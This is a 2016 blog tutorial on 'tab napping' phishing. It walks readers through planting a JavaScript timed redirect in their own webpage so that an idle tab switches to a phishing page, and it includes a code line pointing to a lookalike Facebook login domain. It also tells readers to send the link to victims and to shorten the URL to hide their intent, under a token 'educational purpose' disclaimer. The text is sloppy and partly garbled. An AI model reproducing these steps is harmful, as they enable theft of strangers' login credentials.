Thursday, May 26, 2016

TAB NAPPING :: ADVANCED METHOD OF PHISHING WITH HELP OF A REDIRECTING JAVASCRIPT[TUT]






INTODUCTION:

Tab napping is new type ofphishing scamthat does notrequireyou to click on anyurlto redirect you to thephishing siteinstd it relies on the fact that a lot of people used tabbed browsing(Opening multiple tabs while browsing).In tab napping one of your inactive tab is automatically replaced by with a new tab without your knowledge.Tab Napping is a type ofphishingwith smarter way to confuse the victim.For exampleVictim was viewing page A in a tab of a browser and then left this idle and now using some other website in another tab of browser. After some time the page A will automatically change to the phishing page. This is yourphishing page. Id is to confuse the victim in multiple tabs of browser.


now lets move on to the tutorial :1. first we need a simple phishing setup that we have discussed before u can get ur phisher from here.click here
2. u will need ur hosting/blog/aur any webpage in which u can put the java script to sent its link to victim.
3. get ur java script frm here.
4.now u replace the link with your phishing page link in the java script from this line which comes in two places in the script

timerRedirect = setInterval("loion.href='http://facb00kloagin.my3gb.com/index.html'",10000); //set timed redirect
5. after replacing it Now, Select all & Copy Tab Napping script andyou need to paste this at the end of the rl page html (mns above </html> ).
6.this script will not make any change on ur web page or blog page.
This script will track the user actions and as soon as the blog will kept idl ,That script will redirect the victim to the phishing page your derived.Now send this blog address to your victim or u can upload ur malicous webpage on a web hosting & then send the link to victim.
7. now for more betterment u can shorten ur url so that victim wont be able to know ur intentions get any url shortner from here
HERE IS A DEMO OF TABNAPPING PAGE:
# Just Go HERE and waitkeep yourself idle for 10 sec. U will be redirected to my phishing page. Note: This is illegal and is for eduional purpose only. Any loss/damage happening will not be in any way our responsibility.

No comments:

Post a Comment